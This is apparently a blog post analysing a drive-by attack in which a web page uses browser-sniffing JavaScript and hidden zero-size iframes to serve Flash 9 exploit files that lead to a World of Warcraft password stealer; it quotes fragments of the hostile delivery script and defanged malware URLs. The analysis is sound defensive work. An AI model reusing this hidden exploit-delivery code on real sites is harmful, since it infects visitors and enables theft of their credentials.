I recently stumbled across an article on the internet storm center about (v9/10) flash files (swf) which exploit your browser and install a World of Warcraft Password stealer. So lets take a closer look at what happens there. The URL which servers the SWF files is hxxp://www_svc7_com/1.html (don´t visit the site unless you know what you are doing).
What i did was a simple wget with disbaled user-agent string and retrieved the 1.html. This file contains some javascript code to determine the browser which is visiting and then includes another file in an iframe. Part of the script looks like this:
[...]
if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)
{
document.write(\'<iframe src=\"b.asp\" width=0 height=0></iframe>\');
} else {
document.write(\'<EMBED src=\"dadongf.swf\" width=0 height=0>\');
}
[...]
Thus, if internet explorer is used, the b.asp file is included, otherwise the dadongf.swf. So lets take a closer look at the ASP file, it includes further javascript code to determine the flashplayer version running. At the time of this writting the ASP file checks if the major player version is 9 and then checks for the minor version and serves for different minor versions different SWF files. Thus, flashplayers of version 8 or earlier or version 10 and higher are not exploited. Following is a part of the ASP file:
[...]
if (version['major'] == 9)
{
document.getElementById('flashversion').innerHTML = "";
// 9e
if (version['rev'] == 115)
{
var so = new SWFObject("./9e.swf", "mymovie", "0.1", "0.1", "9", "#000000");
so.write("flashcontent");
document.write('<EMBED src="9e10.swf" width=0 height=0>');
}
// 9c/d
else if (version['rev'] == 47)
{
var so = new SWFObject("./47.swf", "mymovie", "0.1", "0.1", "9", "#000000");
so.write("flashcontent");
}
[...]
After all the script checks for seven different minor versions of the flashplayer version 9 and serves a different SWF file accordingly. The next step is to download the SWF files and
see if we can find any malicious download URLs within. To retrieve the file we use wget again.
As already mentioned in the internet storm center article the swfdump tool does not work with SWF files of version 9 and greater so we take another tool called flasm. The tool can decompress
the compressed flash file for us. Thus we use the following command to decompress the SWF files:
flasm -x 9e.swf
The resulting decompressed file can then be analyzed with the linux tool strings to retrieve any printable data. Following is the information we were looking for right from the start:
A URL to the actual malware binary, the World of Warcraft Password stealer.
hxxp://vjd6_cn/lo/bigfots_exe
The Virustotal report for this file can be found at Virustotal.